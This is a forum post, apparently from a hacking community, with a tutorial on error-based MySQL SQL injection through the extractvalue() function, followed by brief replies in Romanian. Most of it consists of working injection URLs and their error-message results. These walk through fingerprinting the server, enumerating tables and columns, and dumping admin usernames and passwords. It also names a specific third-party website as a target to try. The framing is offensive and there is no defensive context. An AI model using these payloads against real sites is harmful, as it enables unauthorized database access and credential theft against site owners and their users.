SQL injection -- with extractvalue()

[denjacker]

Introduction.

In this tutorial i will be teaching you SQL injection using the xml function extractvalue() to extract data from mySQL versions 5.1 and above. This tutorial assumes that you have an understanding of the structure of mySQL and the basic functions and operators needed for SQL injection so i wont be covering them.

Advantages of this injection type

- No need for union.

- Can find version(), user(), database() without using select.

- Good error based injection to use when getting the error "The used select statements have a diffrent number of columns" with union.

- More clearer than the generic Double Query.

Disavantages

- extractvalue() isnt supported on mySQL versions below 5.1

The tutorial.

Grabbing the targets mySQL server data

So you have found a website and have confirmed that an SQL injection exist by adding a single quote after the parameter and receiving a mySQL error, now we can extract the version, user, database etc by using this injection:

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--

Result:

'Xpath syntax error: 5.5.9:user@localhost'

So we have received the version() and user() by error message so we know its vulnerable so we will move on to gaining the admins login details.

Finding the database tables

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--

Result:

'Xpath syntax error: <address'

So now we have the first table in the database 'address' by using LIMIT to skip all the information_schema tables.

Now we need to go through the tables using 'limit' untill we find a table named admin, user, tbl_admin, users or similar

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))--

Result:

'Xpath syntax error: :users'

So we have found a table named 'users' which will most likely hold the columns which contain the usernames and passwords.

Now we move onto finding the column names.

protip: Start at limit 75,1 to skip the database schema tables.

Finding the database columns

So now that we have selected the table we want we now need to find the columns containing the login data, look for username, password, user, pass or similar.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--

Result:

'Xpath syntax error: :username'

So on the 1051st column we found the column named 'username', now we need to look for the column containing the password.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--

Result:

'Xpath syntax error: :password'

So on the 1151st column in the database we found the column named 'password'. Now we move onto the final step.

Protip: Start at limit 970,1 to skip all the Database schema columns.

Extracting data - the final step

All we do now is join the columns together from the users table like so.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--

Result:

'Xpath syntax error: :Admin:password1'

Whoila! you now have the admin login details in username:password format.

You can find a good example of when to use this injection here:

http://www.sientries.co.uk/event.php?event_id=460

Hope you like this tutorial, please take time to leave your feedback.

Credits: --Error 403 - forbidden-- @ HF

[UnUser]

Bravo dae. Bun tutorial.

PS: Ti-ai schimbat ID-ul de messenger ?

Daca da, da-mi un pm...

[Error 403 - forbidden]

M-am uitat modul